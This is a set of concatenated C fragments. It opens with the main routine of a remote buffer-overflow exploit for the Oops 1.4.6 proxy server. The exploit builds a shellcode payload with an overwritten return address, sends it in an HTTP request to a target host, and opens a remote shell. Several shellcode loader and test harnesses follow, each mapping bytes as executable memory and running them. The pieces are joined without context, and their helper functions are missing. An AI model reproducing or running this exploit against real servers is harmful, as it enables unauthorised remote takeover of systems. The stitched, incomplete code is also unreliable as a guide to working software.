main(int ac, char** av){
#define SZ 0x2000
#define FIL 0xbf
char buf[SZ],buf2[SZ],*pc,c;
int i,sock;
struct sockaddr_in sin;
short port=3128;
unsigned *pu;
memset(buf,FIL,SZ);
shellcode(buf);
buf[strlen(buf)]=FIL;
pc=&buf[OFFSET2];
shellcode(pc);
pc+=strlen(pc);
*pc=FIL;
pu=(unsigned*)&buf[RETOFF];
*pu=BUFADDR;
buf[RETOFF+4]=0;
strcpy(buf2,"GET http://p");
strcat(buf2,buf);
strcat(buf2," HTTP/1.0\r\n\r\n");
fprintf(stderr,"oops-1.4.6 remote xpl0it for 4.x by diman.\n");
fprintf(stderr,"use for educational purpose only.\n");
if(ac<2) {
fprintf(stderr,"usage: ./oopz target_host [port, def=3128]\n");
exit(0);
}
pc=av[1];
if(ac>2) port=atoi(av[2]);
if(!res(pc,&sin)) {
fprintf(stderr,"can't resolve %s\n",pc);
exit(0);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
sin.sin_port=htons(port);
if(connect(sock,(struct sockaddr*)&sin,sizeof(struct sockaddr))==-1) {
fprintf(stderr,"can't connect %s:%d\n",pc,port);
exit(0);
}
fprintf(stderr,"Connected. Sending surprise...\n");
send(sock,buf2,strlen(buf2),0);
spawned_shell(sock);
}
int main(int argc, char **argv) {
int fd;
struct stat sbuf;
void (*shellcode)(void);
int i, z;
unsigned char *p;
if (argc != 2) {
fprintf(stderr, "Usage: %s [filename]\n", argv[0]);
return EXIT_FAILURE;
}
if ((fd = open(argv[1], O_RDONLY)) < 0) {
perror("open() failed");
return EXIT_FAILURE;
}
if (fstat(fd, &sbuf)) {
perror("fstat() failed");
return EXIT_FAILURE;
}
if ((shellcode = mmap(NULL, sbuf.st_size, PROT_READ | PROT_EXEC,
MAP_PRIVATE, fd, 0)) == MAP_FAILED) {
perror("mmap() failed");
return EXIT_FAILURE;
}
close(fd);
printf("Read %d bytes of shell code. Here goes.\n", (int)sbuf.st_size);
for (i = 0, z = 0, p = (void *)shellcode; i < sbuf.st_size; i++) {
if (p[i] == '\0')
z++;
}
if (z > 0)
printf("Shellcode contains %d zero bytes.\n", z);
printf("~~~ Running shellcode ~~~\n");
shellcode();
/* should not be reached */
return EXIT_FAILURE;
}
int main(int argc, char **argv) {
char *stack_space[0x1000];
int fd;
struct stat sbuf;
void (*shellcode)(void);
int i, z, c, bufsize, numb;
unsigned char *p;
if (argc != 2) {
fprintf(stderr, "Usage: %s (<filename>|-)\n", argv[0]);
return EXIT_FAILURE;
}
if (strcmp(argv[1], "-") == 0) {
bufsize = 4096;
p = malloc(bufsize);
z = 0;
numb = 0;
while ((c = getchar()) != EOF) {
if (numb == bufsize) {
bufsize += 4096;
p = realloc(p, bufsize);
}
p[numb++] = c;
if (c == '\0') z++;
}
if ((shellcode = mmap(NULL, numb, PROT_READ | PROT_EXEC | PROT_WRITE,
MAP_ANONYMOUS | MAP_PRIVATE, -1, 0)) == MAP_FAILED) {
perror("mmap() failed");
return EXIT_FAILURE;
}
memcpy(shellcode, p, numb);
free(p);
} else {
if ((fd = open(argv[1], O_RDONLY)) < 0) {
perror("open() failed");
return EXIT_FAILURE;
}
if (fstat(fd, &sbuf)) {
perror("fstat() failed");
return EXIT_FAILURE;
}
if ((shellcode = mmap(NULL, sbuf.st_size, PROT_READ | PROT_EXEC | PROT_WRITE,
MAP_PRIVATE, fd, 0)) == MAP_FAILED) {
perror("mmap() failed");
return EXIT_FAILURE;
}
close(fd);
for (i = 0, z = 0, p = (void *)shellcode; i < sbuf.st_size; i++) {
if (p[i] == '\0') z++;
}
numb = sbuf.st_size;
}
printf("Read %d bytes of shell code. Here goes.\n", numb);
if (z > 0) printf("Shellcode contains %d zero bytes.\n", z);
printf("~~~ Running shellcode ~~~\n");
shellcode();
/* should not be reached */
return EXIT_FAILURE;
}
int sctest(ShellCode const sc)
{
int(*shellcode)() = (int (*)())sc.code;
shellcode();
return EXIT_SUCCESS;
}
int main(int argc, char** argv) {
printf("Shellcode size is %d bytes\n", strlen(code));
int (*shellcode)() = (int(*)())code;
shellcode();
}
int main() {
//printf("Shellcode size: %d bytes\n", sizeof(&shellcode));
int i;
for(i=0; i<=256; i++) putchar((char *)(shellcode+i));
shellcode();
}
